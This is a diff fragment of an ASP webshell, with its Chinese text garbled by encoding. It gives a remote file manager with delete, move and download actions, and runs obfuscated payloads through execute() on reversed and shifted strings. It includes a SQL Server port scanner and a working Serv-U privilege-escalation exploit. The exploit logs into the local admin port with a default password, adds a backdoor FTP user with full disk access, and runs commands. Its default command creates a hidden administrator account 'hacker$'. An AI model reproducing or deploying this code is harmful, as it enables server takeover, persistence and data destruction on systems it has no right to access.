+    Next:End Function:Function Show1File(Path):Set FOLD=CF.GetFolder(Path)
+  i=0
+    SI="<table width='100%' border='0' cellspacing='0' cellpadding='0'><tr>"
+  For Each F in FOLD.subfolders
+    SI=SI&"<td height=10>"
+    SI=SI&"<a href='javascript:ShowFolder("""&RePath(Path&"\"&F.Name)&""")' title=""��""><font face='wingdings' size='6'>0</font>"&F.Name&"</a>" 
+	SI=SI&" _<a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""CopyFolder"")'  onclick='return yesok()' class='am' title='����'>Copy</a>"
+    SI=SI&"  <a href='javascript:FullForm("""&Replace(Path&"\"&F.Name,"\","\\")&""",""DelFolder"")'  onclick='return yesok()' class='am' title='ɾ��'>Del</a>"
+	SI=SI&" <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""MoveFolder"")'  onclick='return yesok()' class='am' title='�ƶ�'>Move</a>"
+	SI=SI&" <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""DownFile"")'  onclick='return yesok()' class='am' title='����'>Down</a></td>"
+	i=i+1
+    If i mod 3 = 0 then SI=SI&"</tr><tr>"
+  Next
+    SI=SI&"</tr><tr><td height=2></td></tr></table>"
+	RRS SI &"<hr noshade size=1 color=""#"" />" : SI=""
+  For Each L in Fold.files
+    SI="<table width='100%' border='0' cellspacing='0' cellpadding='0'>"
+    SI=SI&"<tr style='boungroup-color:#'>"
+	SI=SI&"<td height='30'><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DownFile"");' title='����'><font face='wingdings' size='4'>2</font>"&L.Name&"</a></td>"
+    SI=SI&"<td width='40' align=""center""><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""EditFile"")' class='am' title='�༭'>edit</a></td>"
+	SI=SI&"<td width='40' align=""center""><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DelFile"")'  onclick='return yesok()' class='am' title='ɾ��'>del</a></td>"
+	SI=SI&"<td width='40' align=""center""><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""CopyFile"")' class='am' title='����'>copy</a></td>"
+	SI=SI&"<td width='40' align=""center""><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""MoveFile"")' class='am' title='�ƶ�'>move</a></td>"	
+    SI=SI&"<td width='50' align=""center"">"&clng(L.size/1024)&"K</td>"
+	SI=SI&"<td width='200' align=""center"">"&L.Type&"</td>"
+    SI=SI&"<td width='160'>"&L.DateLastModified&"</td>"
+    SI=SI&"</tr></table>"
+	RRS SI:SI=""
+  Next
+  Set FOLD=Nothing:End function:
+  Function DelFile(Path):
+execute(shisanfun("fI dnE���>tpircs<>'��&ssaPresU&��=p&��&1rts&���&nufE SRR��))fLrCbv,����,))43(rhC,����,)edoca(tpyrcnE(ecalper(ecalper(esreveRrtS=nufE��IS SRR��lrUkcaB&IS=IS���>retnec/<�����ɳ�ɾ ��&htaP&�� ����>rb<>rb<>rb<>retnec<��=IS��htaP eliFeteleD.FC��nehT )htaP(stsixEeliF.FC fI"))
+End Function:
+Function EditFile(Path):execute(shisanfun("IS SRR���>mrof/<>'�汣'=eulav 'timbus'=epyt 'timbus'=eman tupni<;psbn&;psbn&;psbn&>'����'=eulav 'teser'=epyt 'teser'=eman tupni<;psbn&;psbn&;psbn&>';)(kcab.yrotsih'=kcilcno '�ط�'=eulav 'nottub'=epyt 'kcabog'=eman tupni<>rh<��&IS=IS���>rb<>aeratxet/<��&txT&��>'054:thgieh;%001:htdiw'=elyts 'tnetnoC'=eman aeratxet<��&IS=IS���>rb<>'%001:htdiw'=elyts '��&htaP&��'=eulav 'emaNF'=eman tupni<��&IS=IS���>'neddih'=epyT 'eliFtidE'=eulav 'noitcA'=eman tupni<��&IS=IS���>'mroFtidE'=eman 'tsop'=dohtem 'tsoP=2noitcA?��&LRU&��'=noitca mroF<��&IS=IS��fI dnE�����Ľ��©�=txT:��psa.elifwen\��&)��htaPredloF��(noisseS=htaP��eslE��gnihtoN=T teS��esolc.T�� )lladaer.T(edocnELMTH=txT��)eslaF ,1 ,htaP(eliftxetnepo.FC=T teS��nehT ���><htaP fI��fI dnE��dnE.esnopseR����&lruypoc&��� SRR��IS SRR��lrUkcaB&IS=IS���>retnec/<�����ɴ汣����>rb<>rb<>rb<>retnec<��=IS��gnihton=T teS��esolc.T��)��tnetnoc��(mrof.tseuqeR eniLetirW.T��)htaP(eliFtxeTetaerC.FC=T teS��nehT ��tsoP��=)��2noitcA��(tseuqeR fI")):End Function:Function CopyFile(Path):Path = Split(Path,"||||")
+    If CF.FileExists(Path(0)) and Path(1)<>"" Then
+	  CF.CopyFile Path(0),Path(1)
+      SI="<center><br><br><br>�ļ�"&Path(0)&"���Ƴɹ���</center>"
+      SI=SI&BackUrl
+	  RRS SI 
+	End If:End Function:Function MoveFile(Path):Path = Split(Path,"||||")
+    If CF.FileExists(Path(0)) and Path(1)<>"" Then
+	  CF.MoveFile Path(0),Path(1)
+      SI="<center><br><br><br>�ļ�"&Path(0)&"�ƶ��ɹ���</center>"
+      SI=SI&BackUrl
+	  RRS SI 
+	End If
+:End Function:Function DelFolder(Path):If CF.FolderExists(Path) Then
+	  CF.DeleteFolder Path
+      SI="<center><br><br><br>Ŀ¼"&Path&"ɾ���ɹ���</center>"
+      SI=SI&BackUrl
+	  RRS SI
+	End If:End Function:Function CopyFolder(Path):Path = Split(Path,"||||")
+    If CF.FolderExists(Path(0)) and Path(1)<>"" Then
+	  CF.CopyFolder Path(0),Path(1)
+      SI="<center><br><br><br>Ŀ¼"&Path(0)&"���Ƴɹ���</center>"
+      SI=SI&BackUrl
+	  RRS SI
+	End If:End Function:Function MoveFolder(Path):Path = Split(Path,"||||")
+    If CF.FolderExists(Path(0)) and Path(1)<>"" Then
+	  CF.MoveFolder Path(0),Path(1)
+      SI="<center><br><br><br>Ŀ¼"&Path(0)&"�ƶ��ɹ���</center>"
+      SI=SI&BackUrl
+	  RRS SI
+	End If:End Function:Function NewFolder(Path):If Not CF.FolderExists(Path) and Path<>"" Then
+	  CF.CreateFolder Path
+      SI="<center><br><br><br>Ŀ¼"&Path&"�½��ɹ���</center>"
+      SI=SI&BackUrl
+	  RRS SI
+	End If:End Function:End Class
+execute(LUnEnCode("�egzx%isj?KN%ISJ�e'x%'+jrnyjmy+'%sn%xxjhtwUCwmA'XWW�e..6wjrny27wjrny-ysn-wyxhBjrnyjmy�ewjrny%B%7wjrny�ey}jS�ekN%isJ�ey}jS�ey}jS�ekN%isJ�ekN%isJ�e.'CwgAwjgrzs%yts%xn%'%+%.n-ury-XWW�ejxqJ�ekN%isJ�e.'CwgAwjgrzs%yts%xn%'%+%Sisj%+%'%wt%'%+%Sywfyx-XWW�ejxqJ�ey}jS�e.o1}}}%+%ywfyXun-sfhX%qqfH�eSisj%tY%Sywfyx%B%o%wtK�esjmY%.Sisj-hnwjrzsxN%isf%.Sywfyx-hnwjrzsxN%kN�e.%}pjjx%2%..n-ury-sjQ%1.n-ury-ymlnW%B%Sisj�e.%6%2%}pjjx%1.n-ury-ykjQ%B%Sywfyx�esjmY%5%C%}pjjx%kN�e.'2'%1.n-ury-wyXsN%B%}pjjx�ejxqJ�e..n-ury%1}}}%+%ywfyXun-sfhX%qqfH�e%sjmY%..n-ury-hnwjrzsxN%kN�e.ury-isztgZ%tY%5%B%n%wtK�e..'2'1.zm-un-wyXsN2..zm-un-sjQ160.'2'1.zm-un-wyXsN1.zm-un-inR%ty%.6160.'3'1.zm-un-{jWwyXsN1.zm-un-inR%B%}}}%wtK�e..'3'1.zm-un-{jWwyXsN161.zm-un-inR%B%ywfyXun�ejxqJ�ey}jS�ekN%isJ�ekN%isJ�e.'CwgAwjgrzs%yts%xn%'%+%.n-ury-XWW�ejxqJ�ekN%isJ�e.'CwgAwjgrzs%yts%xn%'%+%Sisj%+%'%wt%'%+%Sywfyx-XWW�ejxqJ�ey}jS�e.o%1.zm-un-sfhX%qqfH�eSisj%tY%Sywfyx%B%o%wtK�esjmY%.Sisj-hnwjrzsxN%isf%.Sywfyx-hnwjrzsxN%kN�e.%}pjjx%2%..n-ury-sjQ%1.n-ury-ymlnW%B%Sisj�e.%6%2%}pjjx%1.n-ury-ykjQ%B%Sywfyx�esjmY%5%C%}pjjx%kN�e.'2'%1.n-ury-wyXsN%B%}pjjx�ejxqJ�e..n-ury%1.zm-un-sfhX%qqfH�e%sjmY%..n-ury-hnwjrzsxN%kN�e.ury-isztgZ%tY%5%B%n%wtK�esjmY%5%B%.'2'1.zm-un-wyXsN%kN�e.un-isztgZ%ty%5%B%zm%wtK�e.'1'1.'un'-rwtK3yxjzvjw-ynquX%B%un�e.'1'1.'ywtu'-rwtK3yxjzvjw-ynquX%B%ury�e.'CwmACwgACg4A?�汨��ɨCgA'-XWW�ewjrny%B%6wjrny�esjmY%''%CA%.'sfhx'-rwtK3yxjzvjw%kN�e'Crwtk4ACu4A'XWW�e'C,666,Bjzqf{%,sfhx,Bin%,sjiinm,Bju~y%,sfhx,Bjrfs%yzusnA'XWW�e'C,%sfhx%,Bjzqf{%,rtyyzg,Bxxfqh%,ynrgzx,Bju~y%,ynrgzx,Bjrfs%yzusnA'XWW�e'CwgACwgA'XWW�e'C,'+yxnQywtU+',Bjzqf{%,5;,Bj nx%,}tGy}jY,Bxxfqh%,y}jy,Bju~y%,ywtu,Bjrfs%yzusnA'XWW�e'?yxnQ%ywtUCwgA'XWW�e'C,5;,Bj nx%,'+UN+',Bjzqf{%,un,Bin%,}tGy}jY,Bxxfqh%,y}jy,Bju~y%,un,Bjrfs%yzusnA%'XWW�e'@uxgs+?UN%sfhXCuA'XWW�e'C,@jzwyBijqgfxni3ynrgzx36rwtk,BynrgzXst%,,Bstnyhf%,yxtu,Bitmyjr%,6rwtk,Bjrfs%rwtkA'XWW�e'Cu4A.IRH��ʹ�����˸�1���ϱȶ���1�ڶ˸�����ɨ����-����ɨ�ڶ�CuA'XWW�ekn%isj�e.'un'-rwtK3yxjzvjwBUN�ejxqj�e'635353<76'BUN�esjmy%''B.'un'-rwtK3yxjzvjw%kn�ekn%isj�e.'ywtu'-rwtK3yxjzvjwByxnQywtU�ejxqj�e'68;:1=:>891>=88188961:991>861:86156615=1:7187167'ByxnQywtU�esjmy%''B.'ywtu'-rwtK3yxjzvjw%kn�e555;<<<%B%yztjrnYyunwhX3wj{wjX?.-ywtUsfhX%gzx?gzx%isj?kn%isj�ekN%isJ�e~fwwFjmy%+%'CnqA'XwW�ejxqJ%�ey}jS�e.n-~fwwFjmy%+%'CnqA'XwW�e.~fwwFjmy-isztGZ%tY%5Bn%wtK�esjmY%.~fwwFjmy-~fwwFxN%kN�e.myfUjmy-ifjWljW3]x|B~fwwFjmy�e.'myfUjmy'-yxjzvjWBmyfUjmy�e.'qqjmX3yunwhX\'-yhjogTjyfjwH3wj{wjX%B%]x|%yjX�ey}jS%jrzxjW%wtwwJ%sT�esjmy%''CA.'myfUjmy'-yxjzvjW%kn�e'C4wmACrwtk4A'XwW�e'Csfux4A'XwW�e'C4wmAC,@jsts?~fquxni,Bjq~yx%tksNynijljwBin%sfuxA'XwW�e'CwgAC4wgA#.��������ϰ�-����Ŀ���ǰ��!%isnGajlfpsnQaunuhYaxjhn{wjXa655yjXqtwystHaRJYX^XaRQPM'XwW�e'Cu4ACuACwgAC4wgA#��������鼸��!%ysztHarzsJaunuhYaxjhn{wjXa655yjXqtwystHaRJYX^XaRQPM'XwW�e'Cu4ACuAC4wgA22222222222222222222WJ[T22222222222'XwW�e'CwgAC4wgA#�ڶ�UIZ������!%xywtUij|tqqFUIZa#J7GJ::HI=98628KKF2H5G92>>J=2=76:;9F=!axjhfkwjysNaxwjyjrfwfUaunuhYaxjhn{wjXa655yjXqtwystHaRJYX^XaRQPM'XwW�e'CwgAC4wgA#�ڶ�UN4UHY������!%xywtUij|tqqFUHYa#J7GJ::HI=98628KKF2H5G92>>J=2=76:;9F=!axjhfkwjysNaxwjyjrfwfUaunuhYaxjhn{wjXa655yjXqtwystHaRJYX^XaRQPM'XwW�e'CwgAC4wgA#XSI��!%wj{wjXjrfSa#J7GJ::HI=98628KKF2H5G92>>J=2=76:;9F=!axjhfkwjysNaxwjyjrfwfUaunuhYaxjhn{wjXayjXqtwystHysjwwzHaRJYX^XaRQPM'XwW�e'CwgAC4wgA#������Ĭ!%_XdNYZRdLJW1~f|jyfLyqzfkjIa#J7GJ::HI=98628KKF2H5G92>>J=2=76:;9F=!axjhfkwjysNaxwjyjrfwfUaunuhYaxjhn{wjXayjXqtwystHysjwwzHaRJYX^XaRQPM'XwW�e'Cu4ACuAC4wgA222222222ȷ׼���ǵ�֪��1�����Ķ���Ҫ��������2222222'XwW�e'CwgAC4wgA#��·UN����!%61IWT\IdLJW1wjyztWjqgfsJUNaxwjyjrfwfUaunuhYaxjhn{wjXa655yjXqtwystHaRJYX^XaRQPM'XwW�e'CwgAC4wgA#.����������-ѡɸUN4UHY����!%61IWT\IdLJW1xwjyqnK~ynwzhjXjqgfsJaxwjyjrfwfUaunuhYaxjhn{wjXayjXqtwystHysjwwzhaRJYX^XaRQPM'XwW�e'CwgAC4wgA#���������չ�!%51_XdLJW1xj{nwIyjSijwfmXjqgfsJaxwjyjrfwfUawj{wjXsfrsfQaxjhn{wjXayjXqtwystHysjwwzHaRJYX^XaRQPM'XwW�e'CwgAC4wgA#������Ĭֹ��!%51IWT\IdLJW1wj{wjXjwfmXtyzFaxwjyjrfwfUawj{wjXsfrsfQaxjhn{wjXayjXqtwystHysjwwzHaRJYX^XaRQPM'XwW�e'CwgAC4wgA#����)HUN�����������޻�������B71���л��û������з��޻�������B61ʡȱB5!%51IWT\IdLJW1xztr~stsfyhnwyxjwafxQaqtwystHayjXqtwystHysjwwzHaRJYX^XaRQPM'XwW�e'CwgAC4wgA#����¼�Ǵ���ʾ�Բ�!%61_XdLJW1jrfSwjxZyxfQ~fquxnI2ystIastltqsn\astnxwj[ysjwwzHax|tisn\ayktxtwhnRajwf|yktXaRQPM'XwW�e'CwgACwgACwgA%%C,%����snrifWȡ��%,Bjzqf{%ynrgzxBju~y%yzusnA%'XwW�e'CsjiinmBju~y%5=Bj nx%,snriFWaRJYX^XaJSNMHFRdQFHTQd^JPM,Bjzqf{%snrifwBjrfs%yzusnA'XwW�e'CsnrifwBjrfs%ljWifjwBjzqf{%sjiinmBju~y%yzusnA'XwW�e'%%C,%����HS[ȡ��%,Bjzqf{%ynrgzxBju~y%yzusnA%'XwW�e'CsjiinmBju~y%5=Bj nx%,iwt|xxfUa8HS[sn\aQWTajwf|yktXaZHPM,Bjzqf{%hs{Bjrfs%yzusnA'XwW�e'Chs{Bjrfs%hs{Bjzqf{%sjiinmBju~y%yzusnA'XwW�e'CwgACwgAC,%ȡ��%,Bjzqf{%ynrgzxBju~y%yzusnA%'XwW�e'C5=Bj nx%,jrfSwjyzurtHajrfSwjyzurtHajrfSwjyzurtHaqtwystHayjXqtwystHysjwwzHaRJYX^XaRQPM,Bjzqf{%myfUjmyBjrfs%yzusnA'XwW�e'CyhFjmyBjrfs%ljWifjwBjzqf{%sjiinmBju~y%yzusnA'XwW�e'CyxtuBitmyjr%rwtkA'XwW�e'C4wmA?ȡ��ֵ������ע'XwW?.-LJWifjW%gzx�egzX%isJ�e?'Cqt4A'%XWW�ekN%isJ�e'CwgA'%+%iwt|xxfUsnltQtyzf%+%'%?���ܻ��ʵ�¼�Ƕ���'%XWW�ekN%isJ�e'jxqfK'%XWW�ewfjqH3wwJ�esjmY%wwJ%kN�e.~jPxxfUsnltQtyzf%+%myfUsnltQtyzf-ifjWljW3]x|%B%iwt|xxfUsnltQtyzf�e'CwgA'%+%jrfswjxZsnltQtyzf%+%'%?����ͳϵ��¼�Ƕ���'%XWW�e.~jPwjxZsnltQtyzf%+%myfUsnltQtyzf-ifjWljW3]x|%B%jrfswjxZsnltQtyzf�ejxqJ�e'C4wgA����δ�ܹ�¼�Ƕ���ͳϵ'%XWW�esjmY%5%B%jqgfsJsnltQtyzFxn%kN�e.~jPjqgfsJsnltQtyzf%+%myfUsnltQtyzf-ifjWljW3]x|%B%jqgfsJsnltQtyzFxn�e'iwt|xxfUyqzfkjI'%B%~jPxxfUsnltQtyzf�e'jrfSwjxZyqzfkjI'%B%~jPwjxZsnltQtyzf�e'stltQsnriFtyzF'%B%~jPjqgfsJsnltQtyzf�e'astltqsn\astnxwj[ysjwwzHaYS%x|tisn\ayktxtwhnRaJWF\YKTXaJSNMHFRdQFHTQd^JPM'%B%myfUsnltQtyzf�ekN%isJ�e'C4wgA'%+%ywtUrwjy%+%'%?�ڶ��������ǰ��'%XWW�ejxqJ%�e'C4wgA3���޵��ܾ��ѷ�����Ȩ�����%1�ڶ�������յ��÷���'XWW�e%sjmY%5%CA%wjgrzS3wwJ%wT%''%B%ywtUrwjy%kN�e'CqtAC4wmA¼�Ƕ��Լ��ڶ��������'%XWW�e.~jPywtUqfsnrwjy%+%myfUywtUqfsnrwjy-ifjWljW3]x|%B%ywtUrwjy�e'wjgrzSywtU'%B%~jPywtUqfsnrwjy�e'auhY2UIWaxstnyfyXsn\awj{wjX%qfsnrwjYaqtwystHayjXqtwystHysjwwzHaRJYX^XaRQPM'%B%myfUywtUqfsnrwjy�eiwt|xxfUsnltQtyzf%1jrfswjxZsnltQtyzf%1~jPjqgfsJsnltQtyzf%1jqgfsJsnltQtyzFxn%rnI�e~jPxxfUsnltQtyzf%1~jPwjxZsnltQtyzf%1myfUsnltQtyzf%rnI�eywtUrwjy%1~jPywtUqfsnrwjy%1myfUywtUqfsnrwjy%rnI�e.'qqjmX3yunwhX\'-yhjogTjyfjwH3wj{wjX%B%]x|%yjX�e'222222222222222222222222222222222222222222222222222222'%jynw\3jxstuxjW�e'CwgA'+ywtU\FU+'?Ϊ�ڶ�jwjm|~sFhUCnqA'%jynw\3jxstuxjW�e'jwjm|~sFhuװ�����ǻ�����ȷ��3ȡ����'BywtU\FU%sjmy%''BywtU\FU%kN�e.~jPjwjm|~sFhu-ifjWljW3mx\BywtU\FU�e'ywtUfyfIUNUHYarjyx~Xastnxwj[ysjwwzHajwjm|~sFhuahjysfr~XaJWF\YKTXaJSNMHFRdQFHTQd^JPM'B~jPjwjm|~sFhu�e'CwgA'+ywtUrwjY+'?Ϊ�ڶ�jhn{wjX%qfsnrwjYCnqA'%jynw\3jxstuxjW�e'��������wj{wjX%x|tisn\Ϊ������ȷ��3ȡ������'BywtUrwjY%sjmY%''BywtUrwjY%kN�e.~jPrwjY-ifjWljW3mx\BywtUrwjY�e'wjgrzSywtUauhyaxiYai|uiwaxi\awj{wjX%qfsnrwjYaqtwystHayjXqtwystHysjwwzHaRJYX^XaJSNMHFRdQFHTQd^JPM'B~jPrwjY�e'CwgA'+ywtuysqY+'?�ڶ�yjsqjYCnqA'%jynw\3jxstuxjW�e'87'BysqY%sjmY%''BywtUysqY%kn�e.~jPyjsqjY-ifjWljW3mx\BywtUysqY�e'ywtUyjsqjYa536awj{wjXyjsqjYayktxtwhnRaJWF\YKTXaJSNMHFRdQFHTQd^JPM'B~jpyjsqjY�e.'qqjmX3yunwhX\'-yhjogTjyfjwH3wj{wjX%B%mx|%yjX�e'C6Bj nx%wmACwgAb��̽�ڶ�����`CwgACwgA'%jynw\3jxstuxjW�ey}jS%jrzxjW%wtwwJ%sT?.-tksNqfsnrwjYyjl%gzx"))
+Sub Scan(targetip, portNum):On Error Resume Next:set conn = Server.CreateObject("ADODB.connection"):connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","& portNum &";User ID=lake2;Password=;":conn.ConnectionTimeout=1:conn.open connstr:If Err Then:If Err.number = -2147217843 or Err.number = -2147467259 Then:If InStr(Err.description, "(Connect()).") > 0 Then:RRS(targetip & ":" & portNum & ".......�ر�<br>"):Else:RRS(targetip & ":" & portNum & ".......<font color=red>����</font><br>"):End If:End If:End If:End Sub
+Select Case Action
+Case "MainMenu":MainMenu():Case "getTerminalInfo":getTerminalInfo():Case "PageAddToMdb":PageAddToMdb():case "ScanPort":ScanPort():Case "Servu":SUaction=request("SUaction")
+if  not isnumeric(SUaction) then response.end
+user = trim(request("u"))
+pass = trim(request("p"))
+port = trim(request("port"))
+cmd = trim(request("c"))
+f=trim(request("f"))
+if f="" then
+f=gpath()
+else
+   f=left(f,2)
+end if
+ftpport = 21
+timeout=3
+loginuser = "User " & user & vbCrLf
+loginpass = "Pass " & pass & vbCrLf
+deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
+mt = "SITE MAINTENANCE" & vbCrLf
+newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
+newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
+        "-HomeDir=c:\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
+        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
+        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
+        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
+        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
+        "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\|RWAMELCDP" & vbCrLf
+quit = "QUIT" & vbCrLf
+newuser=replace(newuser,"c:",f)
+select case SUaction
+case 1
+set a=Server.CreateObject("Microsoft.XMLHTTP")
+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True, "", ""
+a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
+set session("a")=a
+RRS"<form method='post' name='goldsun'>"
+RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+RRS"<input name='SUaction' type='hidden' id='SUaction' value='2'></form>"
+RRS"<script language='javascript'>"
+RRS"document.write('<center>�������� 127.0.0.1:"&port&",ʹ���û���: "&user&",���"&pass&"...<center>');"
+RRS"setTimeout('document.all.goldsun.submit();',4000);"
+RRS"</script>"
+case 2
+set b=Server.CreateObject("Microsoft.XMLHTTP")
+b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", True, "", ""
+b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
+set session("b")=b
+RRS"<form method='post' name='goldsun'>"
+RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+RRS"<input name='SUaction' type='hidden' id='SUaction' value='3'></form>"
+RRS"<script language='javascript'>"
+RRS"document.write('<center>��������Ȩ��,��ȴ�...,<center>');"
+RRS"setTimeout(""document.all.goldsun.submit();"",4000);"
+RRS"</script>"
+case 3
+set c=Server.CreateObject("Microsoft.XMLHTTP")
+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", ""
+a.send loginuser & loginpass & mt & deldomain & quit
+set session("a")=a
+RRS"<center>��Ȩ���,��ִ�������<br><font color=red>"&cmd&"</font><br><br>"
+RRS"<input type=button value=' ���ؼ��� ' onClick=""location.href='?Action=Servu';"">"
+RRS"</center>"
+case else
+on error resume next
+    set a=session("a")
+    set b=session("b")
+    set c=session("c")
+    a.abort
+    Set a = Nothing
+    b.abort
+    Set b = Nothing
+    c.abort
+    Set c = Nothing
+RRS"<center><form method='post' name='goldsun'>"
+RRS"<table width='494' height='163' border='1' cellpadding='0' cellspacing='1' bordercolor='#666666'>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td colspan='2'>Serv-U ����Ȩ�� ASP�� 6.4</td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td width='100'>�û���:</td>"
+RRS"<td width='379'><input name='u' type='text' id='u' value='LocalAdministrator'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�� �</td>"
+RRS"<td><input name='p' type='text' id='p' value='#l@$ak#.lk;0@P'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�� �ڣ�</td>"
+RRS"<td><input name='port' type='text' id='port' value='43958'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>ϵͳ·����</td>"
+RRS"    <td><input name='f' type='text' id='f' value='"&f&"' size='8'></td>"
+RRS"  </tr>"
+RRS"  <tr align='center' valign='middle'>"
+RRS"    <td>�����</td>"
+RRS"    <td><input name='c' type='text' id='c' value='cmd /c net user hacker$ hacker /add & net localgroup administrators hacker$ /add' size='50'></td>"
+RRS"  </tr>"
+RRS" <tr align='center' valign='middle'>"
+RRS"    <td colspan='2'><input type='submit' name='Submit' value='�ύ'> "
+RRS"<input type='reset' name='Submit2' value='����'>"
+RRS"<input name='SUaction' type='hidden' id='action' value='1'></td>"
+RRS"  </tr>"
+RRS" <tr align='center' valign='middle'>"
+RRS"    <td>˵������</td>"
+RRS"    <td><input name='ccc' type='text' id='ccc' value='���滻��:cmd /c D:\web\���ϴ���ľ��.exe Ҳ������VBS' size='50'></td>"
+RRS"  </tr>"
+RRS"</tr></table></form></center>"
+end select
+function Gpath()
+on error resume next
+    err.clear
+    set f=Server.CreateObject("Scripting.FileSystemObject")
+    if err.number>0 then
+	gpath="c:"
+        exit function
+    end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing
+end function
+
+  Case "kmuma"
+	dim Report
+	if request.QueryString("act")<>"scan" then
+	  	RRS ("<b>��վ��Ŀ¼</b>- "&Server.MapPath("/")&"<br>")
+		RRS ("<b>������Ŀ¼</b>- "&Server.MapPath("."))
+		RRS "<form action=""?Action=kmuma&act=scan"" method=""post"" name=""form1"">"
+		RRS "<p><b>������Ҫ����·����</b>"
+		RRS "<input name=""path"" type=""text"" style=""border:1px solid #999"" value=""."" size=""30"" /> �\����վ��Ŀ¼����.��Ϊ������Ŀ¼<br><br>"
+		RRS "��Ҫ��ʲô: <input class=c name=""radiobutton"" type=""radio"" value=""sws"" onClick=""document.getElementById('showFile1').style.display='none'"" checked>��ASP ��"
+		RRS "<input class=c type=""radio"" name=""radiobutton"" value=""sf"" onClick=""document.getElementById('showFile1').style.display=''"">������������֮�ļ�<br>"
+		RRS "<br /><div id=""showFile1"" style=""display:none"">"
+		RRS "&nbsp;&nbsp;�������ݣ�<input name=""Search_Content"" type=""text"" id=""Search_Content"" style=""border:1px solid #999"" size=""20"">"
+		RRS " Ҫ���ҵ��ַ����������ֻ�������ڼ��<br />"
+		RRS "&nbsp;&nbsp;�޸����ڣ�<input name=""Search_Date"" type=""text"" style=""border:1px solid #999"" value="""&Left(Now(),InStr(now()," ")-1)&""" size=""20""> ���������;����������������д <a href=""#"" onClick=""javascript:form1.Search_Date.value='ALL'"">ALL</a><br />"
+		RRS "&nbsp;&nbsp;�ļ����ͣ�<input name=""Search_FileExt"" type=""text"" style=""border:1px solid #999"" value=""*"" size=""20""> ����֮����,������*��ʾ��������<br /><br /></div>"
+		RRS "<input type=""submit"" value="" ��ʼɨ�� "" style=""padding:2px 2px 0px 2px;margin:4px;"" />"
+		RRS "</form>"
+	else
+		if request.Form("path")="" then
+			RRS("·������Ϊ��")
+			response.End()
+		end if
+		if request.Form("path")="\" then
+			TmpPath = Server.MapPath("\")
+		elseif request.Form("path")="." then
+			TmpPath = Server.MapPath(".")
+		else
+			TmpPath = request.Form("path")
+		end if
+		
+		timer1 = timer
+		Sun = 0
+		SumFiles = 0
+		SumFolders = 1
+		If request.Form("radiobutton") = "sws" Then
+			DimFileExt = "asp,cer,asa,cdx"
+			Call ShowAllFile(TmpPath)
+		Else
+			If request.Form("path") = "" or request.Form("Search_Date") = "" or request.Form("Search_FileExt") = "" Then
+				RRS("������������ȫ<br><br><a href='javascript:history.go(-1);'>�뷵����������</a>")
+				response.End()
+			End If
+			DimFileExt = request.Form("Search_fileExt")
+			Call ShowAllFile2(TmpPath)
+		End If
+RRS "<table width=""100%"" border=""0"" cellpadding=""0"" cellspacing=""0"" style='font-size:12px'>"
+RRS "<tr><th>Scan WebShell</tr>"
+RRS "<tr><td style=""padding:5px;line-height:170%;clear:both;font-size:12px"">"
+RRS "<div id=""updateInfo"" style=""background:ffffe1;border:1px solid #89441f;padding:4px;display:none""></div>"
